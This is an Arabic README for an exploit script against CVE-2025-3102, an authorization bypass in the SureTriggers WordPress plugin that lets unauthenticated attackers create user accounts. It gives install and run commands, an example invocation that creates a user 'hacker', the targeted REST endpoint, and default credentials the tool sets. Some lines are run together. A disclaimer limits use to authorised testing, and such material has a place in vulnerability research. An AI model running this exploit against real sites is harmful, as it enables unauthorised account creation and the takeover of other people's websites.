
SureTriggers <= 1.0.78 - ثغرة تجاوز التفويض
تستغل هذه الأداة ثغرة تجاوز التفويض في إضافة SureTriggers لووردبريس (الإصدارات <= 1.0.78)، مما يسمح للمهاجمين غير المصادق عليهم بإنشاء حسابات مستخدمين جديدة في ووردبريس.
🔥 تم التطوير بواسطة 0xgh057r3c0n
requests, coloramaتثبيت التبعيات:
pip3 install -r requirements.txt
أو يدويًا:
pip3 install requests colorama
python3 CVE-2025-3102.py -u <target_url> [--newmail <email>] [--newuser <username>] [--newpassword <password>]
python3 CVE-2025-3102.py -u https://target-site.com --newuser hacker --newpassword Pass123!
readme.txt.wp-json/sure-triggers/v1/automation/action.تم توفير هذه الأداة لأغراض تعليمية واختبار الاختراق المصرح به فقط. الوصول غير المصرح به للأنظمة غير قانوني ويعاقب عليه القانون. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج.
| الوسيط | الوصف | القيمة الافتراضية |
|---|
-u, --url | الرابط الأساسي لموقع ووردبريس | مطلوب |
--newmail | عنوان البريد الإلكتروني للمستخدم الجديد | [email protected] |
--newuser | اسم المستخدم المراد إنشاؤه | 0xgh057r3c0n |
--newpassword | كلمة المرور للمستخدم الجديد | Wiz007@8876@ |